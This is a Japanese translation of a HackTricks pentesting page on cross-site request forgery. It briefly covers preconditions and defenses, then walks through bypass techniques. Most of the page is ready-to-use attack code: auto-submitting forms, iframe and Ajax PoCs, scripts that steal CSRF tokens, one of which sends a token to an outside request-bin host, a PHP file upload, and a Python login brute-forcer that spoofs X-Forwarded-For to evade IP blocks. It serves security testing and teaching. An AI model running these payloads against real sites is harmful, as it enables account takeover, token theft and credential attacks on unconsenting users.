hacktricks/pentesting-web/csrf-cross-site-request-forgery.md

30 KiB
Raw Blame History

CSRF (クロスサイトリクエストフォージェリ)

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

クロスサイトリクエストフォージェリ (CSRF) の説明

クロスサイトリクエストフォージェリ (CSRF) は、ウェブアプリケーションに見られるセキュリティ脆弱性の一種です。これは、攻撃者が認証されたセッションを悪用して、無防備なユーザーの代わりにアクションを実行できるようにします。攻撃は、被害者のプラットフォームにログインしているユーザーが悪意のあるサイトを訪れたときに実行されます。このサイトは、JavaScriptの実行、フォームの送信、または画像の取得などの方法を通じて、被害者のアカウントへのリクエストをトリガーします。

CSRF攻撃の前提条件

CSRF脆弱性を悪用するには、いくつかの条件を満たす必要があります

  1. 価値のあるアクションを特定する: 攻撃者は、ユーザーのパスワード、メールアドレスの変更、または権限の昇格など、悪用する価値のあるアクションを見つける必要があります。
  2. セッション管理: ユーザーのセッションは、クッキーまたはHTTP基本認証ヘッダーを通じてのみ管理されるべきです。他のヘッダーはこの目的のために操作できません。
  3. 予測不可能なパラメータの不在: リクエストには予測不可能なパラメータが含まれていない必要があります。これらは攻撃を防ぐ可能性があります。

クイックチェック

Burpでリクエストをキャプチャし、CSRF保護を確認することができます。また、ブラウザからテストするには、Copy as fetchをクリックしてリクエストを確認できます:

CSRFからの防御

CSRF攻撃から保護するために実装できるいくつかの対策があります

  • SameSiteクッキー: この属性は、ブラウザがクロスサイトリクエストと共にクッキーを送信するのを防ぎます。SameSiteクッキーについての詳細
  • クロスオリジンリソースシェアリング: 被害者サイトのCORSポリシーは、攻撃の実行可能性に影響を与える可能性があります。特に、攻撃が被害者サイトからの応答を読み取る必要がある場合。CORSバイパスについて学ぶ
  • ユーザー確認: ユーザーのパスワードを求めたり、キャプチャを解決させたりすることで、ユーザーの意図を確認できます。
  • リファラーまたはオリジンヘッダーの確認: これらのヘッダーを検証することで、リクエストが信頼できるソースから来ていることを確認できます。ただし、URLを慎重に作成することで、実装が不十分なチェックを回避できる場合があります。例えば
  • http://mal.net?orig=http://example.comを使用するURLが信頼できるURLで終わる
  • http://example.com.mal.netを使用するURLが信頼できるURLで始まる
  • パラメータ名の変更: POSTまたはGETリクエストのパラメータ名を変更することで、自動化された攻撃を防ぐのに役立ちます。
  • CSRFトークン: 各セッションにユニークなCSRFトークンを組み込み、以降のリクエストでこのトークンを要求することで、CSRFのリスクを大幅に軽減できます。トークンの効果は、CORSを強制することで向上させることができます。

これらの防御を理解し実装することは、ウェブアプリケーションのセキュリティと整合性を維持するために重要です。

防御のバイパス

POSTからGETへ

悪用したいフォームがCSRFトークンを持つPOSTリクエストを送信するように準備されているかもしれませんが、GET有効であり、GETリクエストを送信したときにCSRFトークンがまだ検証されているか確認する必要があります。

トークンの欠如

アプリケーションは、トークンが存在する場合にトークンを検証するメカニズムを実装しているかもしれません。しかし、トークンが存在しない場合に検証が完全にスキップされると、脆弱性が生じます。攻撃者は、トークンを運ぶパラメータを削除することによってこれを悪用できます。これにより、検証プロセスを回避し、クロスサイトリクエストフォージェリ (CSRF) 攻撃を効果的に実行できます。

CSRFトークンがユーザーセッションに結びついていない

アプリケーションがCSRFトークンをユーザーセッションに結びつけていない場合、重大なセキュリティリスクが存在します。これらのシステムは、各トークンが開始セッションに結びついていることを確認するのではなく、グローバルプールに対してトークンを検証します。

攻撃者がこれを悪用する方法は次のとおりです:

  1. 自分のアカウントを使用して認証します。
  2. グローバルプールから有効なCSRFトークンを取得します。
  3. このトークンを使用して、被害者に対するCSRF攻撃を行います。

この脆弱性により、攻撃者は被害者の代わりに無許可のリクエストを行うことができ、アプリケーションの不十分なトークン検証メカニズムを悪用します。

メソッドバイパス

リクエストが「奇妙なメソッドを使用している場合、メソッドオーバーライド機能が機能しているか確認してください。例えば、PUTメソッドを使用している場合、POSTメソッドを使用して送信することを試みることができます:https://example.com/my/dear/api/val/num?_method=PUT

これは、POSTリクエスト内に_methodパラメータを送信するか、ヘッダーを使用することでも機能します:

  • X-HTTP-Method
  • X-HTTP-Method-Override
  • X-Method-Override

カスタムヘッダートークンのバイパス

リクエストがCSRF保護メソッドとしてトークンを持つカスタムヘッダーを追加している場合:

  • カスタマイズされたトークンとヘッダーなしでリクエストをテストします。
  • 同じ長さだが異なるトークンでリクエストをテストします。

CSRFトークンがクッキーによって検証される

アプリケーションは、トークンをクッキーとリクエストパラメータの両方に複製することによってCSRF保護を実装するか、CSRFクッキーを設定し、バックエンドで送信されたトークンがクッキーに対応しているかを検証することがあります。アプリケーションは、リクエストパラメータ内のトークンがクッキーの値と一致するかどうかを確認することでリクエストを検証します。

ただし、この方法は、攻撃者が被害者のブラウザにCSRFクッキーを設定できる脆弱性がある場合、CSRF攻撃に対して脆弱です。攻撃者は、クッキーを設定する欺瞞的な画像を読み込んだ後、CSRF攻撃を開始することでこれを悪用できます。

以下は、攻撃がどのように構成されるかの例です:

<html>
<!-- CSRF Proof of Concept - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://example.com/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="hidden" name="csrf" value="tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" />
<input type="submit" value="Submit request" />
</form>
<img src="https://example.com/?search=term%0d%0aSet-Cookie:%20csrf=tZqZzQ1tiPj8KFnO4FOAawq7UsYzDk8E" onerror="document.forms[0].submit();"/>
</body>
</html>

{% hint style="info" %} 注意してください、csrfトークンがセッションクッキーに関連している場合、この攻撃は機能しません。なぜなら、あなたは被害者のセッションを設定する必要があり、そのため自分自身を攻撃することになります。 {% endhint %}

Content-Typeの変更

こちらによると、プレフライトリクエストを避けるためにPOSTメソッドを使用する場合、許可されているContent-Typeの値は次の通りです

  • application/x-www-form-urlencoded
  • multipart/form-data
  • text/plain

ただし、使用されるContent-Typeによってサーバーのロジックが異なる場合があるため、上記の値や**application/json_text/xmlapplication/xml_などの他の値も試すべきです。

例(こちらからとして、JSONデータをtext/plainとして送信する方法

<html>
<body>
<form id="form" method="post" action="https://phpme.be.ax/" enctype="text/plain">
<input name='{"garbageeeee":"' value='", "yep": "yep yep yep", "url": "https://webhook/"}'>
</form>
<script>
form.submit();
</script>
</body>
</html>

JSONデータのためのプリフライトリクエストのバイパス

POSTリクエストを介してJSONデータを送信しようとする際、HTMLフォームでContent-Type: application/jsonを使用することは直接的には不可能です。同様に、XMLHttpRequestを使用してこのコンテンツタイプを送信すると、プリフライトリクエストが開始されます。それでも、この制限を回避し、サーバーがContent-Typeに関係なくJSONデータを処理するかどうかを確認するための戦略があります

  1. 代替コンテンツタイプの使用: フォームでenctype="text/plain"を設定することにより、Content-Type: text/plainまたはContent-Type: application/x-www-form-urlencodedを使用します。このアプローチは、バックエンドがContent-Typeに関係なくデータを利用するかどうかをテストします。
  2. コンテンツタイプの変更: サーバーがコンテンツをJSONとして認識することを保証しつつプリフライトリクエストを回避するために、Content-Type: text/plain; application/jsonでデータを送信できます。これはプリフライトリクエストをトリガーしませんが、サーバーがapplication/jsonを受け入れるように設定されていれば正しく処理される可能性があります。
  3. SWFフラッシュファイルの利用: あまり一般的ではありませんが、SWFフラッシュファイルを使用してこのような制限を回避する方法もあります。この技術の詳細については、この投稿を参照してください。

リファラー/オリジンチェックのバイパス

リファラーヘッダーを避ける

アプリケーションは、'Referer'ヘッダーが存在する場合のみ検証することがあります。このヘッダーをブラウザが送信しないようにするために、次のHTMLメタタグを使用できます

<meta name="referrer" content="never">

これにより、「Referer」ヘッダーが省略され、一部のアプリケーションでの検証チェックを回避できる可能性があります。

Regexp バイパス

{% content-ref url="ssrf-server-side-request-forgery/url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}

Referrer がパラメータ内で送信する URL のサーバーのドメイン名を設定するには、次のようにします:

<html>
<!-- Referrer policy needed to send the qury parameter in the referrer -->
<head><meta name="referrer" content="unsafe-url"></head>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://ac651f671e92bddac04a2b2e008f0069.web-security-academy.net/my-account/change-email" method="POST">
<input type="hidden" name="email" value="asd&#64;asd&#46;asd" />
<input type="submit" value="Submit request" />
</form>
<script>
// You need to set this or the domain won't appear in the query of the referer header
history.pushState("", "", "?ac651f671e92bddac04a2b2e008f0069.web-security-academy.net")
document.forms[0].submit();
</script>
</body>
</html>

HEADメソッドバイパス

このCTFの解説の最初の部分では、Oakのソースコードが説明されており、ルーターはHEADリクエストをGETリクエストとして処理するように設定されています - これはOakに特有の一般的な回避策です。HEADリクエストを処理する特定のハンドラーの代わりに、単にGETハンドラーに渡され、アプリはレスポンスボディを削除します

したがって、GETリクエストが制限されている場合は、GETリクエストとして処理されるHEADリクエストを送信することができます

エクスプロイトの例

CSRFトークンの抽出

CSRFトークン防御として使用されている場合、XSS脆弱性やダングリングマークアップ脆弱性を悪用して抽出を試みることができます。

HTMLタグを使用したGET

<img src="http://google.es?param=VALUE" style="display:none" />
<h1>404 - Page not found</h1>
The URL you are requesting is no longer available

他のHTML5タグで自動的にGETリクエストを送信できるものは次のとおりです

<iframe src="..."></iframe>
<script src="..."></script>
<img src="..." alt="">
<embed src="...">
<audio src="...">
<video src="...">
<source src="..." type="...">
<video poster="...">
<link rel="stylesheet" href="...">
<object data="...">
<body background="...">
<div style="background: url('...');"></div>
<style>
body { background: url('...'); }
</style>
<bgsound src="...">
<track src="..." kind="subtitles">
<input type="image" src="..." alt="Submit Button">

フォームGETリクエスト

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form method="GET" action="https://victim.net/email/change-email">
<input type="hidden" name="email" value="some@email.com" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

フォームPOSTリクエスト

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form method="POST" action="https://victim.net/email/change-email" id="csrfform">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" /> <!-- Way 1 to autosubmit -->
<input type="submit" value="Submit request" />
<img src=x onerror="csrfform.submit();" /> <!-- Way 2 to autosubmit -->
</form>
<script>
document.forms[0].submit(); //Way 3 to autosubmit
</script>
</body>
</html>

iframeを通じたフォームPOSTリクエスト

<!--
The request is sent through the iframe withuot reloading the page
-->
<html>
<body>
<iframe style="display:none" name="csrfframe"></iframe>
<form method="POST" action="/change-email" id="csrfform" target="csrfframe">
<input type="hidden" name="email" value="some@email.com" autofocus onfocus="csrfform.submit();" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Ajax POST リクエスト

<script>
var xh;
if (window.XMLHttpRequest)
{// code for IE7+, Firefox, Chrome, Opera, Safari
xh=new XMLHttpRequest();
}
else
{// code for IE6, IE5
xh=new ActiveXObject("Microsoft.XMLHTTP");
}
xh.withCredentials = true;
xh.open("POST","http://challenge01.root-me.org/web-client/ch22/?action=profile");
xh.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); //to send proper header info (optional, but good to have as it may sometimes not work without this)
xh.send("username=abcd&status=on");
</script>

<script>
//JQuery version
$.ajax({
type: "POST",
url: "https://google.com",
data: "param=value&param2=value2"
})
</script>

multipart/form-data POST リクエスト

myFormData = new FormData();
var blob = new Blob(["<?php phpinfo(); ?>"], { type: "text/text"});
myFormData.append("newAttachment", blob, "pwned.php");
fetch("http://example/some/path", {
method: "post",
body: myFormData,
credentials: "include",
headers: {"Content-Type": "application/x-www-form-urlencoded"},
mode: "no-cors"
});

multipart/form-data POST リクエスト v2

// https://www.exploit-db.com/exploits/20009
var fileSize = fileData.length,
boundary = "OWNEDBYOFFSEC",
xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("POST", url, true);
//  MIME POST request.
xhr.setRequestHeader("Content-Type", "multipart/form-data, boundary="+boundary);
xhr.setRequestHeader("Content-Length", fileSize);
var body = "--" + boundary + "\r\n";
body += 'Content-Disposition: form-data; name="' + nameVar +'"; filename="' + fileName + '"\r\n';
body += "Content-Type: " + ctype + "\r\n\r\n";
body += fileData + "\r\n";
body += "--" + boundary + "--";

//xhr.send(body);
xhr.sendAsBinary(body);

iframe内からのフォームPOSTリクエスト

<--! expl.html -->

<body onload="envia()">
<form method="POST"id="formulario" action="http://aplicacion.example.com/cambia_pwd.php">
<input type="text" id="pwd" name="pwd" value="otra nueva">
</form>
<body>
<script>
function envia(){document.getElementById("formulario").submit();}
</script>

<!-- public.html -->
<iframe src="2-1.html" style="position:absolute;top:-5000">
</iframe>
<h1>Sitio bajo mantenimiento. Disculpe las molestias</h1>

CSRFトークンを盗んでPOSTリクエストを送信する

function submitFormWithTokenJS(token) {
var xhr = new XMLHttpRequest();
xhr.open("POST", POST_URL, true);
xhr.withCredentials = true;

// Send the proper header information along with the request
xhr.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

// This is for debugging and can be removed
xhr.onreadystatechange = function() {
if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
//console.log(xhr.responseText);
}
}

xhr.send("token=" + token + "&otherparama=heyyyy");
}

function getTokenJS() {
var xhr = new XMLHttpRequest();
// This tels it to return it as a HTML document
xhr.responseType = "document";
xhr.withCredentials = true;
// true on the end of here makes the call asynchronous
xhr.open("GET", GET_URL, true);
xhr.onload = function (e) {
if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
// Get the document from the response
page = xhr.response
// Get the input element
input = page.getElementById("token");
// Show the token
//console.log("The token is: " + input.value);
// Use the token to submit the form
submitFormWithTokenJS(input.value);
}
};
// Make the request
xhr.send(null);
}

var GET_URL="http://google.com?param=VALUE"
var POST_URL="http://google.com?param=VALUE"
getTokenJS();

CSRFトークンを盗み、iframe、フォーム、Ajaxを使用してPostリクエストを送信する

<form id="form1" action="http://google.com?param=VALUE" method="post" enctype="multipart/form-data">
<input type="text" name="username" value="AA">
<input type="checkbox" name="status" checked="checked">
<input id="token" type="hidden" name="token" value="" />
</form>

<script type="text/javascript">
function f1(){
x1=document.getElementById("i1");
x1d=(x1.contentWindow||x1.contentDocument);
t=x1d.document.getElementById("token").value;

document.getElementById("token").value=t;
document.getElementById("form1").submit();
}
</script>
<iframe id="i1" style="display:none" src="http://google.com?param=VALUE" onload="javascript:f1();"></iframe>

CSRFトークンを盗み、iframeとフォームを使用してPOSTリクエストを送信する

<iframe id="iframe" src="http://google.com?param=VALUE" width="500" height="500" onload="read()"></iframe>

<script>
function read()
{
var name = 'admin2';
var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
document.writeln('<form width="0" height="0" method="post" action="http://www.yoursebsite.com/check.php"  enctype="multipart/form-data">');
document.writeln('<input id="username" type="text" name="username" value="' + name + '" /><br />');
document.writeln('<input id="token" type="hidden" name="token" value="' + token + '" />');
document.writeln('<input type="submit" name="submit" value="Submit" /><br/>');
document.writeln('</form>');
document.forms[0].submit.click();
}
</script>

トークンを盗み、2つのiframeを使用して送信する

<script>
var token;
function readframe1(){
token = frame1.document.getElementById("profile").token.value;
document.getElementById("bypass").token.value = token
loadframe2();
}
function loadframe2(){
var test = document.getElementbyId("frame2");
test.src = "http://requestb.in/1g6asbg1?token="+token;
}
</script>

<iframe id="frame1" name="frame1" src="http://google.com?param=VALUE" onload="readframe1()"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>

<iframe id="frame2" name="frame2"
sandbox="allow-same-origin allow-scripts allow-forms allow-popups allow-top-navigation"
height="600" width="800"></iframe>
<body onload="document.forms[0].submit()">
<form id="bypass" name"bypass" method="POST" target="frame2" action="http://google.com?param=VALUE" enctype="multipart/form-data">
<input type="text" name="username" value="z">
<input type="checkbox" name="status" checked="">
<input id="token" type="hidden" name="token" value="0000" />
<button type="submit">Submit</button>
</form>

POSTAjaxを使用してCSRFトークンを盗み、フォームでPOSTを送信する

<body onload="getData()">

<form id="form" action="http://google.com?param=VALUE" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="root"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="findtoken" name="token" value=""/>
<input type="submit" value="valider"/>
</form>

<script>
var x = new XMLHttpRequest();
function getData() {
x.withCredentials = true;
x.open("GET","http://google.com?param=VALUE",true);
x.send(null);
}
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
var token = x.responseText.match(/name="token" value="(.+)"/)[1];
document.getElementById("findtoken").value = token;
document.getElementById("form").submit();
}
}
</script>

CSRF with Socket.IO

<script src="https://cdn.jsdelivr.net/npm/socket.io-client@2/dist/socket.io.js"></script>
<script>
let socket = io('http://six.jh2i.com:50022/test');

const username = 'admin'

socket.on('connect', () => {
console.log('connected!');
socket.emit('join', {
room: username
});
socket.emit('my_room_event', {
data: '!flag',
room: username
})

});
</script>

CSRFログインブルートフォース

このコードは、CSRFトークンを使用してログインフォームをブルートフォースするために使用できます可能なIPブラックリストを回避するために、ヘッダーX-Forwarded-Forも使用しています

import request
import re
import random

URL = "http://10.10.10.191/admin/"
PROXY = { "http": "127.0.0.1:8080"}
SESSION_COOKIE_NAME = "BLUDIT-KEY"
USER = "fergus"
PASS_LIST="./words"

def init_session():
#Return CSRF + Session (cookie)
r = requests.get(URL)
csrf = re.search(r'input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="([a-zA-Z0-9]*)"', r.text)
csrf = csrf.group(1)
session_cookie = r.cookies.get(SESSION_COOKIE_NAME)
return csrf, session_cookie

def login(user, password):
print(f"{user}:{password}")
csrf, cookie = init_session()
cookies = {SESSION_COOKIE_NAME: cookie}
data = {
"tokenCSRF": csrf,
"username": user,
"password": password,
"save": ""
}
headers = {
"X-Forwarded-For": f"{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}.{random.randint(1,256)}"
}
r = requests.post(URL, data=data, cookies=cookies, headers=headers, proxies=PROXY)
if "Username or password incorrect" in r.text:
return False
else:
print(f"FOUND {user} : {password}")
return True

with open(PASS_LIST, "r") as f:
for line in f:
login(USER, line.strip())

ツール

参考文献

経験豊富なハッカーやバグバウンティハンターとコミュニケーションを取るために、HackenProof Discordサーバーに参加しましょう!

ハッキングの洞察
ハッキングのスリルと課題に深く掘り下げたコンテンツに参加しましょう

リアルタイムハックニュース
リアルタイムのニュースと洞察を通じて、急速に変化するハッキングの世界を把握しましょう

最新の発表
新しいバグバウンティの開始や重要なプラットフォームの更新について情報を得ましょう

私たちに参加して Discordで今日からトップハッカーとコラボレーションを始めましょう!

{% hint style="success" %} AWSハッキングを学び、実践するHackTricks Training AWS Red Team Expert (ARTE)
GCPハッキングを学び、実践するHackTricks Training GCP Red Team Expert (GRTE)

HackTricksをサポートする
{% endhint %}